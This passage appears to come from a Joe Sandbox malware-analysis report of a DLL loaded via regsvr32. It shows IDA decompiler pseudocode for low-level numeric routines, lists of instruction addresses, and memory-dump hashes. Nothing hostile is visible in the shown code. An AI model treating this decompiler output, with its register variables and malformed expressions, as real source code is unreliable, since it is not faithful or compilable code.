																	_t187 = ( *_t269 & 0x0000ffff) * ( *_t266 & 0x0000ffff);
																	__eflags = _t206;
																	if(_t206 == 0) {
																		r8d = 0;
																		r9d = _t238 + _t248;
																		__eflags = r9d -  *(_t252 - 4);
																		if(r9d <  *(_t252 - 4)) {
																			L61:
																			r8d = 1;
																			L62:
																			 *(_t252 - 4) = r9d;
																			goto L63;
																		}
																		__eflags = r9d - _t187;
																		if(r9d >= _t187) {
																			goto L62;
																		}
																		goto L61;
																	}
																	r8d = 0;
																	r9d = _t238 + _t248;
																	__eflags = r9d -  *(_t252 - 4);
																	if(r9d <  *(_t252 - 4)) {
																		L57:
																		r8d = 1;
																		L58:
																		 *(_t252 - 4) = r9d;
																		goto L63;
																	}
																	__eflags = r9d - _t187;
																	if(r9d >= _t187) {
																		goto L58;
																	}
																	goto L57;
																	L63:
																	__eflags = r8d;
																	if(r8d != 0) {
																		 *_t252 =  *_t252 + 1;
																		__eflags =  *_t252;
																	}
																	_t182 = _t182 - 1;
																	_t269 =  &(_t269[1]);
																	_t266 = _t266 - 2;
																	__eflags = _t182;
																} while (_t182 > 0);
																L66:
																r12d = r12d - 1;
																_t252 =  &(_t252[0]);
																r13d = r13d + 1;
																__eflags = r12d;
															} while (r12d > 0);
															_t203 = _t202 + 0xc002;
															__eflags = _t203;
															if(__eflags <= 0) {
																r8d = _a88;
																_t198 = _a84;
																r9d = _a80;
																L81:
																_t203 = _t203 + 0xffff;
																__eflags = _t203;
																if(_t203 >= 0) {
																	L73:
																	_t155 = _a80 & 0x0000ffff;
																	L74:
																	__eflags = _t155 - 0x8000;
																	if(_t155 > 0x8000) {
																		L76:
																		_t156 = _a82;
																		__eflags = _t156 - 0xffffffff;
																		if(_t156 != 0xffffffff) {
																			_t157 = _t156 + 1;
																			__eflags = _t157;
																			_a82 = _t157;
																			_t198 = _a84;
																		} else {
																			_t161 = _a86;
																			_a82 = 0;
																			__eflags = _t161 - 0xffffffff;
																			if(_t161 != 0xffffffff) {
																				_a86 = _t161 + 1;
																				r8d = _a88;
																				_t198 = _a84;
																			} else {
																				_t163 = _a90 & 0x0000ffff;
																				_a86 = 0;
																				__eflags = _t163 - 0xffff;
																				if(_t163 != 0xffff) {
																					_t198 = _a84;
																					_a90 = _t163 + 1;
																					r8d = _a88;
																				} else {
																					_t198 = _a84;
																					_a90 = 0x8000;
																					r8d = _a88;
																					_t203 = _t203 + 1;
																				}
																			}
																		}
																		L91:
																		__eflags = _t203 - 0x7fff;
																		if(_t203 < 0x7fff) {
																			_a98 = _t198;
																			_t251 = _a64;
																			_a102 = r8d;
																			r8d = _a48;
																			_a96 = _a82 & 0x0000ffff;
																			_a106 = _t203 | _a56;
																			r9d = 0xffff8000;
																		} else {
																			__eflags = _a56;
																			_t251 = _a64;
																			r8d = _a48;
																			r9d = 0xffff8000;
																			_a100 = 0;
																			_t160 =  !=  ? r9d : 0x7fff8000;
																			_a96 = 0;
																			_a104 =  !=  ? r9d : 0x7fff8000;
																		}
																		goto L95;
																	}
																	r9d = r9d & 0x0001ffff;
																	__eflags = r9d - 0x18000;
																	if(r9d != 0x18000) {
																		goto L91;
																	}
																	goto L76;
																}
																r10d =  ~(_t203 & 0x0000ffff) & 0x0000ffff;
																_t203 = _t203 + r10w;
																__eflags = _t203;
																do {
																	__eflags = _a80 & 0x00000001;
																	if((_a80 & 0x00000001) != 0) {
																		r15d = r15d + 1;
																		__eflags = r15d;
																	}
																	r9d = r9d >> 1;
																	r9d = r9d | _t198 << 0x0000001f;
																	r8d = r8d >> 1;
																	_t198 = _t198 >> 0x00000001 | r8d << 0x0000001f;
																	_t266 = _t266 - 1;
																	__eflags = _t266;
																	_a80 = r9d;
																} while (_t266 != 0);
																__eflags = r15d;
																_a84 = _t198;
																_a88 = r8d;
																if(r15d == 0) {
																	goto L73;
																}
																_t155 = r9w | 0x00000001;
																_a80 = _t155;
																r9d = _a80;
																goto L74;
															}
															r8d = _a88;
															_t198 = _a84;
															r9d = _a80;
															while(1) {
																asm("inc ecx");
																if(__eflags < 0) {
																	break;
																}
																r8d = r8d + r8d;
																_t191 = _t198 >> 0x1f;
																r9d = r9d + r9d;
																_t198 = _t198 + _t198 | r9d >> 0x0000001f;
																r8d = r8d | _t191;
																_t203 = _t203 + 0xffff;
																_a84 = _t198;
																_a88 = r8d;
																__eflags = _t203;
																_a80 = r9d;
																if(__eflags > 0) {
																	continue;
																}
																goto L81;
															}
															__eflags = _t203;
															if(_t203 <= 0) {
																goto L81;
															}
															goto L73;
														}
														_t202 = _t202 + 1;
														asm("btr eax, 0x1f");
														__eflags = _t275[2];
														if(_t275[2] != 0) {
															goto L51;
														}
														__eflags = _t275[1];
														if(_t275[1] != 0) {
															goto L51;
														}
														__eflags =  *_t275;
														if( *_t275 != 0) {
															goto L51;
														}
														_t251 = _a64;
														_a104 = 0;
														_a100 = 0;
														_a96 = 0;
														goto L95;
													}
													_t202 = _t202 + 1;
													asm("btr eax, 0x1f");
													__eflags = _a104;
													if(_a104 != 0) {
														goto L46;
													}
													__eflags = _a100;
													if(_a100 != 0) {
														goto L46;
													}
													__eflags = _a96;
													if(_a96 != 0) {
														goto L46;
													}
													_t251 = _a64;
													_a106 = 0;
													goto L95;
												}
												_t251 = _a64;
												_a104 = 0;
												_a100 = 0;
												_a96 = 0;
											}
											L95:
										} while (r8d != 0);
										_t201 = 0;
									}
									goto L98;
								}
							}
							do {
								_t268 = _t268 - 1;
								r10d = r10d + 0xffffffff;
								_t181 = _t181 + 1;
							} while ( *_t268 == 0);
							goto L19;
						}
						L15:
						__eflags = r10d;
						if(r10d == 0) {
							r8d = _t201;
							_t193 = _t201;
							goto L103;
						}
						goto L16;
					} else {
						goto L12;
					}
					while(1) {
						L12:
						__eflags = _t192 - 0x39;
						if(_t192 > 0x39) {
							goto L14;
						}
						_t192 =  *_t261;
						_t261 = _t261 + _t270;
						__eflags = _t192 - 0x30;
						if(_t192 >= 0x30) {
							continue;
						}
						goto L14;
					}
					goto L14;
				} else {
					while(1) {
						__eflags = __dl - 0x39;
						if(__dl > 0x39) {
							goto L11;
						}
						__ecx = __rax + __rax * 4;
						__eax = __dl;
						__eax = __rax + __rcx * 2 - 0x30;
						__eflags = __eax - 0x1450;
						_a48 = __eax;
						if(__eax > 0x1450) {
							__eax = 0x1451;
							_a48 = 0x1451;
							goto L11;
						}
						__dl =  *__r8;
						__r8 = __r8 + __r12;
						__eflags = __dl - 0x30;
						if(__dl >= 0x30) {
							continue;
						}
						goto L11;
					}
					goto L11;
				}
			}


















































                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b1
                                                                              0x1004f1b6
                                                                              0x1004f1b6
                                                                              0x1004f1bc
                                                                              0x1004f1c0
                                                                              0x1004f1f2
                                                                              0x1004f1f2
                                                                              0x1004f1f5
                                                                              0x1004f207
                                                                              0x1004f207
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x00000000
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f135
                                                                              0x1004f13f
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f2a8
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2d7
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f20f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f1f7
                                                                              0x1004f1f7
                                                                              0x1004f1f7
                                                                              0x1004f1fa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f1fc
                                                                              0x1004f1ff
                                                                              0x1004f202
                                                                              0x1004f205
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f205
                                                                              0x00000000
                                                                              0x1004f1c2
                                                                              0x1004f1c2
                                                                              0x1004f1c2
                                                                              0x1004f1c5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f1c7
                                                                              0x1004f1ca
                                                                              0x1004f1cd
                                                                              0x1004f1d1
                                                                              0x1004f1d6
                                                                              0x1004f1da
                                                                              0x1004f1e9
                                                                              0x1004f1ee
                                                                              0x00000000
                                                                              0x1004f1ee
                                                                              0x1004f1dc
                                                                              0x1004f1df
                                                                              0x1004f1e2
                                                                              0x1004f1e5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f1e7
                                                                              0x00000000
                                                                              0x1004f1c2

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f43a8ae1a0362482d1e335c1c1189a5b10cd9b8f0ba354db40517f2cadf2a846
                                                                              • Instruction ID: 6c9ffbf12f593101c7beae6d9447d414a72670f61edd2b6abd2b8a02e92d410c
                                                                              • Opcode Fuzzy Hash: f43a8ae1a0362482d1e335c1c1189a5b10cd9b8f0ba354db40517f2cadf2a846
                                                                              • Instruction Fuzzy Hash: 516117776287D4C6D760CF25D0447AAB7A2F380780FA0412AEB89C3A69DB7DD544CF04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10052690 Relevance: .2, Instructions: 173COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 56%
                                                                              			E10052690(void* __edx, long long __rbx, unsigned long long __rcx, void* __rdx, long long __rdi, long long __rsi, unsigned int* __r8, void* __r9, void* __r10, void* __r11) {
				unsigned int _t55;
				signed int _t61;
				signed int _t70;
				unsigned int _t75;
				unsigned int _t76;
				unsigned int _t78;
				unsigned int _t81;
				signed int _t85;
				signed int _t93;
				unsigned int _t98;
				signed int _t99;
				unsigned int _t103;
				void* _t104;
				unsigned int _t124;
				signed long long _t127;
				long long _t129;
				unsigned int* _t131;
				unsigned long long _t133;
				long long* _t136;
				void* _t138;
				long long _t143;
				char* _t144;
				signed long long _t146;
				unsigned int* _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				_t150 = __r11;
				_t149 = __r10;
				_t148 = __r9;
				_t147 = __r8;
				_t138 = __rdx;
				_t133 = __rcx;
				_t127 =  *0x1006f4c8; // 0x6f13091946cb
				 *(_t146 + 0x10) = _t127 ^ _t146;
				 *((long long*)(_t146 + 0x58)) = __rbx;
				 *((long long*)(_t146 + 0x30)) = _t143;
				 *((long long*)(_t146 + 0x28)) = __rsi;
				 *((long long*)(_t146 + 0x20)) = __rdi;
				_t131 = __r8;
				_t103 = 0x404e;
				_t104 = __edx;
				_t144 = __rcx;
				 *((intOrPtr*)(__r8)) = 0;
				 *((intOrPtr*)(__r8 + 4)) = 0;
				 *((intOrPtr*)(__r8 + 8)) = 0;
				if(__edx == 0) {
					L25:
					if(_t131[2] != 0) {
						L28:
						asm("bt dword [ebx+0x8], 0xf");
						if(_t124 < 0) {
							L30:
							_t131[2] = _t103;
							return E10038D20(_t80,  *(_t146 + 0x10) ^ _t146);
						} else {
							goto L29;
						}
						do {
							L29:
							_t55 =  *_t131;
							_t80 = _t131[1];
							_t103 = _t103 + 0xffff;
							r8d = _t131[1];
							 *_t131 = _t55 + _t55;
							r8d = r8d >> 0x1f;
							_t131[1] = _t133 + _t133 | _t55 >> 0x0000001f;
							_t61 = _t131[2] + _t131[2] | r8d;
							asm("bt eax, 0xf");
							_t131[2] = _t61;
						} while (_t61 >= 0);
						goto L30;
					}
					do {
						_t93 = _t131[1];
						_t81 =  *_t131;
						_t103 = _t103 + 0xfff0;
						_t131[2] = _t93 >> 0x10;
						_t80 = _t81 << 0x10;
						 *_t131 = _t81 << 0x10;
						_t131[1] = _t93 << 0x00000010 | _t81 >> 0x00000010;
						_t124 = _t131[2];
					} while (_t124 == 0);
					goto L28;
				} else {
					goto L1;
				}
				do {
					L1:
					_t129 =  *_t131;
					r11d = _t131[2];
					_t136 = _t146;
					 *_t136 = _t129;
					r11d = r11d + r11d;
					 *(_t136 + 8) = _t131[2];
					r9d = _t136 + _t136;
					r10d = _t129 + _t129;
					r8d = _t131[1];
					r10d = r10d |  *_t131 >> 0x0000001f;
					r8d = r8d >> 0x1f;
					_t98 = _t148 + _t148;
					r11d = r11d | r8d;
					r11d = r11d + r11d;
					r10d = r10d + r10d;
					r11d = r11d | r10d >> 0x0000001f;
					_t85 =  *_t146;
					r10d = r10d | r9d >> 0x0000001f;
					r8d = _t138 + _t136;
					_t70 = 0;
					 *_t131 = _t98;
					_t131[1] = r10d;
					_t131[2] = r11d;
					if(r8d < _t98 || r8d < _t85) {
						_t70 = 1;
					}
					 *_t131 = r8d;
					if(_t70 != 0) {
						_t18 = _t149 + 1; // 0x1
						_t78 = _t18;
						if(_t78 < r10d || _t78 < 1) {
							_t85 = 1;
						}
						_t131[1] = _t78;
						if(_t85 != 0) {
							_t20 = _t150 + 1; // 0x1
							_t131[2] = _t20;
						}
					}
					_t99 = 0;
					_t133 =  *_t146 >> 0x20;
					r9d = _t129 + _t133;
					if(r9d < _t131[1] || r9d < _t85) {
						_t99 = 1;
					}
					_t131[1] = r9d;
					if(_t99 != 0) {
						_t131[2] = _t131[2] + 1;
					}
					r9d = r9d + r9d;
					_t131[2] = _t131[2] +  *((intOrPtr*)(_t146 + 8));
					r8d = r8d + r8d;
					 *_t131 = r8d;
					r9d = r9d | r8d >> 0x0000001f;
					_t131[2] = _t131[2] + _t131[2] | r9d >> 0x0000001f;
					r10d = 0;
					_t131[1] = r9d;
					_t80 =  *_t144;
					_t75 = _t147 + _t133;
					 *_t146 = _t80;
					if(_t75 < r8d || _t75 < _t80) {
						r10d = 1;
					}
					 *_t131 = _t75;
					if(r10d != 0) {
						_t34 = _t148 + 1; // 0x1
						_t76 = _t34;
						if(_t76 < r9d || _t76 < 1) {
							_t80 = 1;
						}
						_t131[1] = _t76;
						if(_t80 != 0) {
							_t36 = _t138 + 1; // 0x2
							_t131[2] = _t36;
						}
					}
					_t144 = _t144 + 1;
					_t104 = _t104 + 0xffffffff;
				} while (_t104 != 0);
				goto L25;
			}






























                                                                              0x10052690
                                                                              0x10052690
                                                                              0x10052690
                                                                              0x10052690
                                                                              0x10052690
                                                                              0x10052690
                                                                              0x10052694
                                                                              0x1005269e
                                                                              0x100526a5
                                                                              0x100526aa
                                                                              0x100526af
                                                                              0x100526b4
                                                                              0x100526b9
                                                                              0x100526bc
                                                                              0x100526c0
                                                                              0x100526c2
                                                                              0x100526c5
                                                                              0x100526cc
                                                                              0x100526d4
                                                                              0x100526dc
                                                                              0x1005282c
                                                                              0x1005283a
                                                                              0x1005286a
                                                                              0x1005286a
                                                                              0x1005286f
                                                                              0x100528a4
                                                                              0x100528a4
                                                                              0x100528c3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10052871
                                                                              0x10052871
                                                                              0x10052871
                                                                              0x10052873
                                                                              0x10052876
                                                                              0x1005287f
                                                                              0x10052882
                                                                              0x10052887
                                                                              0x10052890
                                                                              0x10052898
                                                                              0x1005289b
                                                                              0x1005289f
                                                                              0x1005289f
                                                                              0x00000000
                                                                              0x10052871
                                                                              0x10052840
                                                                              0x10052840
                                                                              0x10052843
                                                                              0x10052845
                                                                              0x10052852
                                                                              0x10052857
                                                                              0x1005285d
                                                                              0x10052861
                                                                              0x10052864
                                                                              0x10052864
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100526e2
                                                                              0x100526e2
                                                                              0x100526e2
                                                                              0x100526e5
                                                                              0x100526e9
                                                                              0x100526ed
                                                                              0x100526f3
                                                                              0x100526f6
                                                                              0x100526fe
                                                                              0x10052704
                                                                              0x10052708
                                                                              0x10052711
                                                                              0x10052714
                                                                              0x10052718
                                                                              0x1005271c
                                                                              0x10052728
                                                                              0x1005272b
                                                                              0x1005272e
                                                                              0x10052731
                                                                              0x10052734
                                                                              0x10052737
                                                                              0x1005273b
                                                                              0x1005273d
                                                                              0x10052742
                                                                              0x10052746
                                                                              0x1005274a
                                                                              0x10052751
                                                                              0x10052751
                                                                              0x10052758
                                                                              0x1005275b
                                                                              0x1005275d
                                                                              0x1005275d
                                                                              0x10052766
                                                                              0x1005276d
                                                                              0x1005276d
                                                                              0x10052774
                                                                              0x10052777
                                                                              0x10052779
                                                                              0x1005277d
                                                                              0x1005277d
                                                                              0x10052777
                                                                              0x10052787
                                                                              0x10052789
                                                                              0x1005278d
                                                                              0x10052794
                                                                              0x1005279b
                                                                              0x1005279b
                                                                              0x100527a2
                                                                              0x100527a6
                                                                              0x100527a8
                                                                              0x100527a8
                                                                              0x100527b3
                                                                              0x100527b6
                                                                              0x100527c2
                                                                              0x100527cc
                                                                              0x100527cf
                                                                              0x100527d2
                                                                              0x100527d5
                                                                              0x100527d8
                                                                              0x100527dc
                                                                              0x100527e0
                                                                              0x100527e4
                                                                              0x100527ea
                                                                              0x100527f0
                                                                              0x100527f0
                                                                              0x100527f9
                                                                              0x100527fb
                                                                              0x100527fd
                                                                              0x100527fd
                                                                              0x10052806
                                                                              0x1005280d
                                                                              0x1005280d
                                                                              0x10052814
                                                                              0x10052817
                                                                              0x10052819
                                                                              0x1005281c
                                                                              0x1005281c
                                                                              0x10052817
                                                                              0x1005281f
                                                                              0x10052823
                                                                              0x10052823
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 22e1d875c8e4f4b27992844ce72914c3bd7277a5c5b051293debdc1f529b72f1
                                                                              • Instruction ID: f3366c8cf81d161d371bf425f2cd77a8708ed02019c9c05d42bd4220fc55b9cf
                                                                              • Opcode Fuzzy Hash: 22e1d875c8e4f4b27992844ce72914c3bd7277a5c5b051293debdc1f529b72f1
                                                                              • Instruction Fuzzy Hash: 2761AE736196848BD748CF38D45071DBBE1F789B88F54D029EA4ACB758EB38D845CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004EFDE Relevance: .2, Instructions: 169COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
